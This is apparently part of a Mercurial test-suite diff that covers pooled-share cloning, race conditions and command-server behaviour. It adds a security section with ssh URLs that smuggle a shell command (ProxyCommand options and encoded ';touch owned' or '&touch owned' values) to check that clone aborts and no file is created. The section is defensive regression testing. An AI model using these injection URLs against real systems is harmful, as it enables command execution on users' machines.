810 The default path should be the remote, not the share
811
811
812 $ hg -R share-dest1a config paths.default
812 $ hg -R share-dest1a config paths.default
813 $TESTTMP/source1a (glob)
813 $TESTTMP/source1a (glob)
814
814
815 Clone with existing share dir should result in pull + share
815 Clone with existing share dir should result in pull + share
816
816
817 $ hg --config share.pool=share clone source1b share-dest1b
817 $ hg --config share.pool=share clone source1b share-dest1b
818 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
818 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
819 searching for changes
819 searching for changes
820 adding changesets
820 adding changesets
821 adding manifests
821 adding manifests
822 adding file changes
822 adding file changes
823 added 4 changesets with 4 changes to 1 files (+4 heads)
823 added 4 changesets with 4 changes to 1 files (+4 heads)
824 adding remote bookmark head1
824 adding remote bookmark head1
825 adding remote bookmark head2
825 adding remote bookmark head2
826 updating working directory
826 updating working directory
827 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
827 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
828
828
829 $ ls share
829 $ ls share
830 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
830 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
831
831
832 $ cat share-dest1b/.hg/sharedpath; echo
832 $ cat share-dest1b/.hg/sharedpath; echo
833 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
833 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
834
834
835 We only get bookmarks from the remote, not everything in the share
835 We only get bookmarks from the remote, not everything in the share
836
836
837 $ hg -R share-dest1b bookmarks
837 $ hg -R share-dest1b bookmarks
838 head1 3:4a8dc1ab4c13
838 head1 3:4a8dc1ab4c13
839 head2 4:99f71071f117
839 head2 4:99f71071f117
840
840
841 Default path should be source, not share.
841 Default path should be source, not share.
842
842
843 $ hg -R share-dest1b config paths.default
843 $ hg -R share-dest1b config paths.default
844 $TESTTMP/source1b (glob)
844 $TESTTMP/source1b (glob)
845
845
846 Checked out revision should be head of default branch
846 Checked out revision should be head of default branch
847
847
848 $ hg -R share-dest1b log -r .
848 $ hg -R share-dest1b log -r .
849 changeset: 4:99f71071f117
849 changeset: 4:99f71071f117
850 bookmark: head2
850 bookmark: head2
851 parent: 0:b5f04eac9d8f
851 parent: 0:b5f04eac9d8f
852 user: test
852 user: test
853 date: Thu Jan 01 00:00:00 1970 +0000
853 date: Thu Jan 01 00:00:00 1970 +0000
854 summary: head2
854 summary: head2
855
855
856
856
857 Clone from unrelated repo should result in new share
857 Clone from unrelated repo should result in new share
858
858
859 $ hg --config share.pool=share clone source2 share-dest2
859 $ hg --config share.pool=share clone source2 share-dest2
860 (sharing from new pooled repository 22aeff664783fd44c6d9b435618173c118c3448e)
860 (sharing from new pooled repository 22aeff664783fd44c6d9b435618173c118c3448e)
861 requesting all changes
861 requesting all changes
862 adding changesets
862 adding changesets
863 adding manifests
863 adding manifests
864 adding file changes
864 adding file changes
865 added 2 changesets with 2 changes to 1 files
865 added 2 changesets with 2 changes to 1 files
866 searching for changes
866 searching for changes
867 no changes found
867 no changes found
868 updating working directory
868 updating working directory
869 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
869 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
870
870
871 $ ls share
871 $ ls share
872 22aeff664783fd44c6d9b435618173c118c3448e
872 22aeff664783fd44c6d9b435618173c118c3448e
873 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
873 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
874
874
875 remote naming mode works as advertised
875 remote naming mode works as advertised
876
876
877 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1a share-remote1a
877 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1a share-remote1a
878 (sharing from new pooled repository 195bb1fcdb595c14a6c13e0269129ed78f6debde)
878 (sharing from new pooled repository 195bb1fcdb595c14a6c13e0269129ed78f6debde)
879 requesting all changes
879 requesting all changes
880 adding changesets
880 adding changesets
881 adding manifests
881 adding manifests
882 adding file changes
882 adding file changes
883 added 3 changesets with 3 changes to 1 files
883 added 3 changesets with 3 changes to 1 files
884 searching for changes
884 searching for changes
885 no changes found
885 no changes found
886 adding remote bookmark bookA
886 adding remote bookmark bookA
887 updating working directory
887 updating working directory
888 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
888 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
889
889
890 $ ls shareremote
890 $ ls shareremote
891 195bb1fcdb595c14a6c13e0269129ed78f6debde
891 195bb1fcdb595c14a6c13e0269129ed78f6debde
892
892
893 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1b share-remote1b
893 $ hg --config share.pool=shareremote --config share.poolnaming=remote clone source1b share-remote1b
894 (sharing from new pooled repository c0d4f83847ca2a873741feb7048a45085fd47c46)
894 (sharing from new pooled repository c0d4f83847ca2a873741feb7048a45085fd47c46)
895 requesting all changes
895 requesting all changes
896 adding changesets
896 adding changesets
897 adding manifests
897 adding manifests
898 adding file changes
898 adding file changes
899 added 6 changesets with 6 changes to 1 files (+4 heads)
899 added 6 changesets with 6 changes to 1 files (+4 heads)
900 searching for changes
900 searching for changes
901 no changes found
901 no changes found
902 adding remote bookmark head1
902 adding remote bookmark head1
903 adding remote bookmark head2
903 adding remote bookmark head2
904 updating working directory
904 updating working directory
905 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
905 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
906
906
907 $ ls shareremote
907 $ ls shareremote
908 195bb1fcdb595c14a6c13e0269129ed78f6debde
908 195bb1fcdb595c14a6c13e0269129ed78f6debde
909 c0d4f83847ca2a873741feb7048a45085fd47c46
909 c0d4f83847ca2a873741feb7048a45085fd47c46
910
910
911 request to clone a single revision is respected in sharing mode
911 request to clone a single revision is respected in sharing mode
912
912
913 $ hg --config share.pool=sharerevs clone -r 4a8dc1ab4c13 source1b share-1arev
913 $ hg --config share.pool=sharerevs clone -r 4a8dc1ab4c13 source1b share-1arev
914 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
914 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
915 adding changesets
915 adding changesets
916 adding manifests
916 adding manifests
917 adding file changes
917 adding file changes
918 added 2 changesets with 2 changes to 1 files
918 added 2 changesets with 2 changes to 1 files
919 no changes found
919 no changes found
920 adding remote bookmark head1
920 adding remote bookmark head1
921 updating working directory
921 updating working directory
922 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
922 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
923
923
924 $ hg -R share-1arev log -G
924 $ hg -R share-1arev log -G
925 @ changeset: 1:4a8dc1ab4c13
925 @ changeset: 1:4a8dc1ab4c13
926 | bookmark: head1
926 | bookmark: head1
927 | tag: tip
927 | tag: tip
928 | user: test
928 | user: test
929 | date: Thu Jan 01 00:00:00 1970 +0000
929 | date: Thu Jan 01 00:00:00 1970 +0000
930 | summary: head1
930 | summary: head1
931 |
931 |
932 o changeset: 0:b5f04eac9d8f
932 o changeset: 0:b5f04eac9d8f
933 user: test
933 user: test
934 date: Thu Jan 01 00:00:00 1970 +0000
934 date: Thu Jan 01 00:00:00 1970 +0000
935 summary: initial
935 summary: initial
936
936
937
937
938 making another clone should only pull down requested rev
938 making another clone should only pull down requested rev
939
939
940 $ hg --config share.pool=sharerevs clone -r 99f71071f117 source1b share-1brev
940 $ hg --config share.pool=sharerevs clone -r 99f71071f117 source1b share-1brev
941 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
941 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
942 searching for changes
942 searching for changes
943 adding changesets
943 adding changesets
944 adding manifests
944 adding manifests
945 adding file changes
945 adding file changes
946 added 1 changesets with 1 changes to 1 files (+1 heads)
946 added 1 changesets with 1 changes to 1 files (+1 heads)
947 adding remote bookmark head1
947 adding remote bookmark head1
948 adding remote bookmark head2
948 adding remote bookmark head2
949 updating working directory
949 updating working directory
950 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
950 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
951
951
952 $ hg -R share-1brev log -G
952 $ hg -R share-1brev log -G
953 @ changeset: 2:99f71071f117
953 @ changeset: 2:99f71071f117
954 | bookmark: head2
954 | bookmark: head2
955 | tag: tip
955 | tag: tip
956 | parent: 0:b5f04eac9d8f
956 | parent: 0:b5f04eac9d8f
957 | user: test
957 | user: test
958 | date: Thu Jan 01 00:00:00 1970 +0000
958 | date: Thu Jan 01 00:00:00 1970 +0000
959 | summary: head2
959 | summary: head2
960 |
960 |
961 | o changeset: 1:4a8dc1ab4c13
961 | o changeset: 1:4a8dc1ab4c13
962 |/ bookmark: head1
962 |/ bookmark: head1
963 | user: test
963 | user: test
964 | date: Thu Jan 01 00:00:00 1970 +0000
964 | date: Thu Jan 01 00:00:00 1970 +0000
965 | summary: head1
965 | summary: head1
966 |
966 |
967 o changeset: 0:b5f04eac9d8f
967 o changeset: 0:b5f04eac9d8f
968 user: test
968 user: test
969 date: Thu Jan 01 00:00:00 1970 +0000
969 date: Thu Jan 01 00:00:00 1970 +0000
970 summary: initial
970 summary: initial
971
971
972
972
973 Request to clone a single branch is respected in sharing mode
973 Request to clone a single branch is respected in sharing mode
974
974
975 $ hg --config share.pool=sharebranch clone -b branch1 source1b share-1bbranch1
975 $ hg --config share.pool=sharebranch clone -b branch1 source1b share-1bbranch1
976 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
976 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
977 adding changesets
977 adding changesets
978 adding manifests
978 adding manifests
979 adding file changes
979 adding file changes
980 added 2 changesets with 2 changes to 1 files
980 added 2 changesets with 2 changes to 1 files
981 no changes found
981 no changes found
982 updating working directory
982 updating working directory
983 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
983 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
984
984
985 $ hg -R share-1bbranch1 log -G
985 $ hg -R share-1bbranch1 log -G
986 o changeset: 1:5f92a6c1a1b1
986 o changeset: 1:5f92a6c1a1b1
987 | branch: branch1
987 | branch: branch1
988 | tag: tip
988 | tag: tip
989 | user: test
989 | user: test
990 | date: Thu Jan 01 00:00:00 1970 +0000
990 | date: Thu Jan 01 00:00:00 1970 +0000
991 | summary: branch1
991 | summary: branch1
992 |
992 |
993 @ changeset: 0:b5f04eac9d8f
993 @ changeset: 0:b5f04eac9d8f
994 user: test
994 user: test
995 date: Thu Jan 01 00:00:00 1970 +0000
995 date: Thu Jan 01 00:00:00 1970 +0000
996 summary: initial
996 summary: initial
997
997
998
998
999 $ hg --config share.pool=sharebranch clone -b branch2 source1b share-1bbranch2
999 $ hg --config share.pool=sharebranch clone -b branch2 source1b share-1bbranch2
1000 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1000 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1001 searching for changes
1001 searching for changes
1002 adding changesets
1002 adding changesets
1003 adding manifests
1003 adding manifests
1004 adding file changes
1004 adding file changes
1005 added 1 changesets with 1 changes to 1 files (+1 heads)
1005 added 1 changesets with 1 changes to 1 files (+1 heads)
1006 updating working directory
1006 updating working directory
1007 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1007 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1008
1008
1009 $ hg -R share-1bbranch2 log -G
1009 $ hg -R share-1bbranch2 log -G
1010 o changeset: 2:6bacf4683960
1010 o changeset: 2:6bacf4683960
1011 | branch: branch2
1011 | branch: branch2
1012 | tag: tip
1012 | tag: tip
1013 | parent: 0:b5f04eac9d8f
1013 | parent: 0:b5f04eac9d8f
1014 | user: test
1014 | user: test
1015 | date: Thu Jan 01 00:00:00 1970 +0000
1015 | date: Thu Jan 01 00:00:00 1970 +0000
1016 | summary: branch2
1016 | summary: branch2
1017 |
1017 |
1018 | o changeset: 1:5f92a6c1a1b1
1018 | o changeset: 1:5f92a6c1a1b1
1019 |/ branch: branch1
1019 |/ branch: branch1
1020 | user: test
1020 | user: test
1021 | date: Thu Jan 01 00:00:00 1970 +0000
1021 | date: Thu Jan 01 00:00:00 1970 +0000
1022 | summary: branch1
1022 | summary: branch1
1023 |
1023 |
1024 @ changeset: 0:b5f04eac9d8f
1024 @ changeset: 0:b5f04eac9d8f
1025 user: test
1025 user: test
1026 date: Thu Jan 01 00:00:00 1970 +0000
1026 date: Thu Jan 01 00:00:00 1970 +0000
1027 summary: initial
1027 summary: initial
1028
1028
1029
1029
1030 -U is respected in share clone mode
1030 -U is respected in share clone mode
1031
1031
1032 $ hg --config share.pool=share clone -U source1a share-1anowc
1032 $ hg --config share.pool=share clone -U source1a share-1anowc
1033 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1033 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1034 searching for changes
1034 searching for changes
1035 no changes found
1035 no changes found
1036 adding remote bookmark bookA
1036 adding remote bookmark bookA
1037
1037
1038 $ ls share-1anowc
1038 $ ls share-1anowc
1039
1039
1040 Test that auto sharing doesn't cause failure of "hg clone local remote"
1040 Test that auto sharing doesn't cause failure of "hg clone local remote"
1041
1041
1042 $ cd $TESTTMP
1042 $ cd $TESTTMP
1043 $ hg -R a id -r 0
1043 $ hg -R a id -r 0
1044 acb14030fe0a
1044 acb14030fe0a
1045 $ hg id -R remote -r 0
1045 $ hg id -R remote -r 0
1046 abort: repository remote not found!
1046 abort: repository remote not found!
1047 [255]
1047 [255]
1048 $ hg --config share.pool=share -q clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" a ssh://user@dummy/remote
1048 $ hg --config share.pool=share -q clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" a ssh://user@dummy/remote
1049 $ hg -R remote id -r 0
1049 $ hg -R remote id -r 0
1050 acb14030fe0a
1050 acb14030fe0a
1051
1051
1052 Cloning into pooled storage doesn't race (issue5104)
1052 Cloning into pooled storage doesn't race (issue5104)
1053
1053
1054 $ HGPOSTLOCKDELAY=2.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace1 > race1.log 2>&1 &
1054 $ HGPOSTLOCKDELAY=2.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace1 > race1.log 2>&1 &
1055 $ HGPRELOCKDELAY=1.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace2 > race2.log 2>&1
1055 $ HGPRELOCKDELAY=1.0 hg --config share.pool=racepool --config extensions.lockdelay=$TESTDIR/lockdelay.py clone source1a share-destrace2 > race2.log 2>&1
1056 $ wait
1056 $ wait
1057
1057
1058 $ hg -R share-destrace1 log -r tip
1058 $ hg -R share-destrace1 log -r tip
1059 changeset: 2:e5bfe23c0b47
1059 changeset: 2:e5bfe23c0b47
1060 bookmark: bookA
1060 bookmark: bookA
1061 tag: tip
1061 tag: tip
1062 user: test
1062 user: test
1063 date: Thu Jan 01 00:00:00 1970 +0000
1063 date: Thu Jan 01 00:00:00 1970 +0000
1064 summary: 1a
1064 summary: 1a
1065
1065
1066
1066
1067 $ hg -R share-destrace2 log -r tip
1067 $ hg -R share-destrace2 log -r tip
1068 changeset: 2:e5bfe23c0b47
1068 changeset: 2:e5bfe23c0b47
1069 bookmark: bookA
1069 bookmark: bookA
1070 tag: tip
1070 tag: tip
1071 user: test
1071 user: test
1072 date: Thu Jan 01 00:00:00 1970 +0000
1072 date: Thu Jan 01 00:00:00 1970 +0000
1073 summary: 1a
1073 summary: 1a
1074
1074
1075 One repo should be new, the other should be shared from the pool. We
1075 One repo should be new, the other should be shared from the pool. We
1076 don't care which is which, so we just make sure we always print the
1076 don't care which is which, so we just make sure we always print the
1077 one containing "new pooled" first, then one one containing "existing
1077 one containing "new pooled" first, then one one containing "existing
1078 pooled".
1078 pooled".
1079
1079
1080 $ (grep 'new pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1080 $ (grep 'new pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1081 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1081 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1082 requesting all changes
1082 requesting all changes
1083 adding changesets
1083 adding changesets
1084 adding manifests
1084 adding manifests
1085 adding file changes
1085 adding file changes
1086 added 3 changesets with 3 changes to 1 files
1086 added 3 changesets with 3 changes to 1 files
1087 searching for changes
1087 searching for changes
1088 no changes found
1088 no changes found
1089 adding remote bookmark bookA
1089 adding remote bookmark bookA
1090 updating working directory
1090 updating working directory
1091 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1091 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1092
1092
1093 $ (grep 'existing pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1093 $ (grep 'existing pooled' race1.log > /dev/null && cat race1.log || cat race2.log) | grep -v lock
1094 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1094 (sharing from existing pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
1095 searching for changes
1095 searching for changes
1096 no changes found
1096 no changes found
1097 adding remote bookmark bookA
1097 adding remote bookmark bookA
1098 updating working directory
1098 updating working directory
1099 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1099 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1100
1101 SEC: check for unsafe ssh url
1102
1103 $ cat >> $HGRCPATH << EOF
1104 > [ui]
1105 > ssh = sh -c "read l; read l; read l"
1106 > EOF
1107
1108 $ hg clone 'ssh://-oProxyCommand=touch${IFS}owned/path'
1109 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
1110 [255]
1111 $ hg clone 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
1112 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
1113 [255]
1114 $ hg clone 'ssh://fakehost|touch%20owned/path'
1115 abort: no suitable response from remote hg!
1116 [255]
1117 $ hg clone 'ssh://fakehost%7Ctouch%20owned/path'
1118 abort: no suitable response from remote hg!
1119 [255]
1120
1121 $ hg clone 'ssh://-oProxyCommand=touch owned%20foo@example.com/nonexistent/path'
1122 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned foo@example.com/nonexistent/path'
1123 [255]
1124
1125 #if windows
1126 $ hg clone "ssh://%26touch%20owned%20/" --debug
1127 running sh -c "read l; read l; read l" "&touch owned " "hg -R . serve --stdio"
1128 sending hello command
1129 sending between command
1130 abort: no suitable response from remote hg!
1131 [255]
1132 $ hg clone "ssh://example.com:%26touch%20owned%20/" --debug
1133 running sh -c "read l; read l; read l" -p "&touch owned " example.com "hg -R . serve --stdio"
1134 sending hello command
1135 sending between command
1136 abort: no suitable response from remote hg!
1137 [255]
1138 #else
1139 $ hg clone "ssh://%3btouch%20owned%20/" --debug
1140 running sh -c "read l; read l; read l" ';touch owned ' 'hg -R . serve --stdio'
1141 sending hello command
1142 sending between command
1143 abort: no suitable response from remote hg!
1144 [255]
1145 $ hg clone "ssh://example.com:%3btouch%20owned%20/" --debug
1146 running sh -c "read l; read l; read l" -p ';touch owned ' example.com 'hg -R . serve --stdio'
1147 sending hello command
1148 sending between command
1149 abort: no suitable response from remote hg!
1150 [255]
1151 #endif
1152
1153 $ hg clone "ssh://v-alid.example.com/" --debug
1154 running sh -c "read l; read l; read l" v-alid\.example\.com ['"]hg -R \. serve --stdio['"] (re)
1155 sending hello command
1156 sending between command
1157 abort: no suitable response from remote hg!
1158 [255]
1159
1160 We should not have created a file named owned - if it exists, the
1161 attack succeeded.
1162 $ if test -f owned; then echo 'you got owned'; fi
@@ -1,910 +1,987 b''
1 #if windows
1 #if windows
2 $ PYTHONPATH="$TESTDIR/../contrib;$PYTHONPATH"
2 $ PYTHONPATH="$TESTDIR/../contrib;$PYTHONPATH"
3 #else
3 #else
4 $ PYTHONPATH="$TESTDIR/../contrib:$PYTHONPATH"
4 $ PYTHONPATH="$TESTDIR/../contrib:$PYTHONPATH"
5 #endif
5 #endif
6 $ export PYTHONPATH
6 $ export PYTHONPATH
7
7
8 typical client does not want echo-back messages, so test without it:
8 typical client does not want echo-back messages, so test without it:
9
9
10 $ grep -v '^promptecho ' < $HGRCPATH >> $HGRCPATH.new
10 $ grep -v '^promptecho ' < $HGRCPATH >> $HGRCPATH.new
11 $ mv $HGRCPATH.new $HGRCPATH
11 $ mv $HGRCPATH.new $HGRCPATH
12
12
13 $ hg init repo
13 $ hg init repo
14 $ cd repo
14 $ cd repo
15
15
16 >>> from __future__ import print_function
16 >>> from __future__ import print_function
17 >>> from hgclient import readchannel, runcommand, check
17 >>> from hgclient import readchannel, runcommand, check
18 >>> @check
18 >>> @check
19 ... def hellomessage(server):
19 ... def hellomessage(server):
20 ... ch, data = readchannel(server)
20 ... ch, data = readchannel(server)
21 ... print('%c, %r' % (ch, data))
21 ... print('%c, %r' % (ch, data))
22 ... # run an arbitrary command to make sure the next thing the server
22 ... # run an arbitrary command to make sure the next thing the server
23 ... # sends isn't part of the hello message
23 ... # sends isn't part of the hello message
24 ... runcommand(server, ['id'])
24 ... runcommand(server, ['id'])
25 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
25 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
26 *** runcommand id
26 *** runcommand id
27 000000000000 tip
27 000000000000 tip
28
28
29 >>> from hgclient import check
29 >>> from hgclient import check
30 >>> @check
30 >>> @check
31 ... def unknowncommand(server):
31 ... def unknowncommand(server):
32 ... server.stdin.write('unknowncommand\n')
32 ... server.stdin.write('unknowncommand\n')
33 abort: unknown command unknowncommand
33 abort: unknown command unknowncommand
34
34
35 >>> from hgclient import readchannel, runcommand, check
35 >>> from hgclient import readchannel, runcommand, check
36 >>> @check
36 >>> @check
37 ... def checkruncommand(server):
37 ... def checkruncommand(server):
38 ... # hello block
38 ... # hello block
39 ... readchannel(server)
39 ... readchannel(server)
40 ...
40 ...
41 ... # no args
41 ... # no args
42 ... runcommand(server, [])
42 ... runcommand(server, [])
43 ...
43 ...
44 ... # global options
44 ... # global options
45 ... runcommand(server, ['id', '--quiet'])
45 ... runcommand(server, ['id', '--quiet'])
46 ...
46 ...
47 ... # make sure global options don't stick through requests
47 ... # make sure global options don't stick through requests
48 ... runcommand(server, ['id'])
48 ... runcommand(server, ['id'])
49 ...
49 ...
50 ... # --config
50 ... # --config
51 ... runcommand(server, ['id', '--config', 'ui.quiet=True'])
51 ... runcommand(server, ['id', '--config', 'ui.quiet=True'])
52 ...
52 ...
53 ... # make sure --config doesn't stick
53 ... # make sure --config doesn't stick
54 ... runcommand(server, ['id'])
54 ... runcommand(server, ['id'])
55 ...
55 ...
56 ... # negative return code should be masked
56 ... # negative return code should be masked
57 ... runcommand(server, ['id', '-runknown'])
57 ... runcommand(server, ['id', '-runknown'])
58 *** runcommand
58 *** runcommand
59 Mercurial Distributed SCM
59 Mercurial Distributed SCM
60
60
61 basic commands:
61 basic commands:
62
62
63 add add the specified files on the next commit
63 add add the specified files on the next commit
64 annotate show changeset information by line for each file
64 annotate show changeset information by line for each file
65 clone make a copy of an existing repository
65 clone make a copy of an existing repository
66 commit commit the specified files or all outstanding changes
66 commit commit the specified files or all outstanding changes
67 diff diff repository (or selected files)
67 diff diff repository (or selected files)
68 export dump the header and diffs for one or more changesets
68 export dump the header and diffs for one or more changesets
69 forget forget the specified files on the next commit
69 forget forget the specified files on the next commit
70 init create a new repository in the given directory
70 init create a new repository in the given directory
71 log show revision history of entire repository or files
71 log show revision history of entire repository or files
72 merge merge another revision into working directory
72 merge merge another revision into working directory
73 pull pull changes from the specified source
73 pull pull changes from the specified source
74 push push changes to the specified destination
74 push push changes to the specified destination
75 remove remove the specified files on the next commit
75 remove remove the specified files on the next commit
76 serve start stand-alone webserver
76 serve start stand-alone webserver
77 status show changed files in the working directory
77 status show changed files in the working directory
78 summary summarize working directory state
78 summary summarize working directory state
79 update update working directory (or switch revisions)
79 update update working directory (or switch revisions)
80
80
81 (use 'hg help' for the full list of commands or 'hg -v' for details)
81 (use 'hg help' for the full list of commands or 'hg -v' for details)
82 *** runcommand id --quiet
82 *** runcommand id --quiet
83 000000000000
83 000000000000
84 *** runcommand id
84 *** runcommand id
85 000000000000 tip
85 000000000000 tip
86 *** runcommand id --config ui.quiet=True
86 *** runcommand id --config ui.quiet=True
87 000000000000
87 000000000000
88 *** runcommand id
88 *** runcommand id
89 000000000000 tip
89 000000000000 tip
90 *** runcommand id -runknown
90 *** runcommand id -runknown
91 abort: unknown revision 'unknown'!
91 abort: unknown revision 'unknown'!
92 [255]
92 [255]
93
93
94 >>> from hgclient import readchannel, check
94 >>> from hgclient import readchannel, check
95 >>> @check
95 >>> @check
96 ... def inputeof(server):
96 ... def inputeof(server):
97 ... readchannel(server)
97 ... readchannel(server)
98 ... server.stdin.write('runcommand\n')
98 ... server.stdin.write('runcommand\n')
99 ... # close stdin while server is waiting for input
99 ... # close stdin while server is waiting for input
100 ... server.stdin.close()
100 ... server.stdin.close()
101 ...
101 ...
102 ... # server exits with 1 if the pipe closed while reading the command
102 ... # server exits with 1 if the pipe closed while reading the command
103 ... print('server exit code =', server.wait())
103 ... print('server exit code =', server.wait())
104 server exit code = 1
104 server exit code = 1
105
105
106 >>> from hgclient import readchannel, runcommand, check, stringio
106 >>> from hgclient import readchannel, runcommand, check, stringio
107 >>> @check
107 >>> @check
108 ... def serverinput(server):
108 ... def serverinput(server):
109 ... readchannel(server)
109 ... readchannel(server)
110 ...
110 ...
111 ... patch = """
111 ... patch = """
112 ... # HG changeset patch
112 ... # HG changeset patch
113 ... # User test
113 ... # User test
114 ... # Date 0 0
114 ... # Date 0 0
115 ... # Node ID c103a3dec114d882c98382d684d8af798d09d857
115 ... # Node ID c103a3dec114d882c98382d684d8af798d09d857
116 ... # Parent 0000000000000000000000000000000000000000
116 ... # Parent 0000000000000000000000000000000000000000
117 ... 1
117 ... 1
118 ...
118 ...
119 ... diff -r 000000000000 -r c103a3dec114 a
119 ... diff -r 000000000000 -r c103a3dec114 a
120 ... --- /dev/null Thu Jan 01 00:00:00 1970 +0000
120 ... --- /dev/null Thu Jan 01 00:00:00 1970 +0000
121 ... +++ b/a Thu Jan 01 00:00:00 1970 +0000
121 ... +++ b/a Thu Jan 01 00:00:00 1970 +0000
122 ... @@ -0,0 +1,1 @@
122 ... @@ -0,0 +1,1 @@
123 ... +1
123 ... +1
124 ... """
124 ... """
125 ...
125 ...
126 ... runcommand(server, ['import', '-'], input=stringio(patch))
126 ... runcommand(server, ['import', '-'], input=stringio(patch))
127 ... runcommand(server, ['log'])
127 ... runcommand(server, ['log'])
128 *** runcommand import -
128 *** runcommand import -
129 applying patch from stdin
129 applying patch from stdin
130 *** runcommand log
130 *** runcommand log
131 changeset: 0:eff892de26ec
131 changeset: 0:eff892de26ec
132 tag: tip
132 tag: tip
133 user: test
133 user: test
134 date: Thu Jan 01 00:00:00 1970 +0000
134 date: Thu Jan 01 00:00:00 1970 +0000
135 summary: 1
135 summary: 1
136
136
137
137
138 check that "histedit --commands=-" can read rules from the input channel:
138 check that "histedit --commands=-" can read rules from the input channel:
139
139
140 >>> import cStringIO
140 >>> import cStringIO
141 >>> from hgclient import readchannel, runcommand, check
141 >>> from hgclient import readchannel, runcommand, check
142 >>> @check
142 >>> @check
143 ... def serverinput(server):
143 ... def serverinput(server):
144 ... readchannel(server)
144 ... readchannel(server)
145 ... rules = 'pick eff892de26ec\n'
145 ... rules = 'pick eff892de26ec\n'
146 ... runcommand(server, ['histedit', '0', '--commands=-',
146 ... runcommand(server, ['histedit', '0', '--commands=-',
147 ... '--config', 'extensions.histedit='],
147 ... '--config', 'extensions.histedit='],
148 ... input=cStringIO.StringIO(rules))
148 ... input=cStringIO.StringIO(rules))
149 *** runcommand histedit 0 --commands=- --config extensions.histedit=
149 *** runcommand histedit 0 --commands=- --config extensions.histedit=
150
150
151 check that --cwd doesn't persist between requests:
151 check that --cwd doesn't persist between requests:
152
152
153 $ mkdir foo
153 $ mkdir foo
154 $ touch foo/bar
154 $ touch foo/bar
155 >>> from hgclient import readchannel, runcommand, check
155 >>> from hgclient import readchannel, runcommand, check
156 >>> @check
156 >>> @check
157 ... def cwd(server):
157 ... def cwd(server):
158 ... readchannel(server)
158 ... readchannel(server)
159 ... runcommand(server, ['--cwd', 'foo', 'st', 'bar'])
159 ... runcommand(server, ['--cwd', 'foo', 'st', 'bar'])
160 ... runcommand(server, ['st', 'foo/bar'])
160 ... runcommand(server, ['st', 'foo/bar'])
161 *** runcommand --cwd foo st bar
161 *** runcommand --cwd foo st bar
162 ? bar
162 ? bar
163 *** runcommand st foo/bar
163 *** runcommand st foo/bar
164 ? foo/bar
164 ? foo/bar
165
165
166 $ rm foo/bar
166 $ rm foo/bar
167
167
168
168
169 check that local configs for the cached repo aren't inherited when -R is used:
169 check that local configs for the cached repo aren't inherited when -R is used:
170
170
171 $ cat <<EOF >> .hg/hgrc
171 $ cat <<EOF >> .hg/hgrc
172 > [ui]
172 > [ui]
173 > foo = bar
173 > foo = bar
174 > EOF
174 > EOF
175
175
